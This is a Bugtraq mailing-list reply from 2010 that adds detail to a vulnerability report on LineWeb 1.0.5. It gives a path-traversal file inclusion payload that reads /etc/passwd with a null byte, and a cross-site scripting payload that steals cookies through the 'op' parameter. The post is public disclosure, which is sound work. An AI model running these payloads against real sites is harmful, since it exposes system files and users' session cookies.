Bugtraq mailing list archives

Previous By Date Next
Previous By Thread Next

Re: Multiple vulnerabilities in LineWeb 1.0.5

From: ign.sec () gmail com
Date: 6 Jan 2010 09:55:46 -0000
One thing i forgot, a %00 must be included at the end of the LFI, IE: index.php?op=../../../../../../../etc/passwd%00 

And ?op is vulnerable to a xss attack, IE:
index.php?op=<script>alert(document.cookie)</script>

Ignacio.
Previous By Date Next
Previous By Thread Next

Current thread: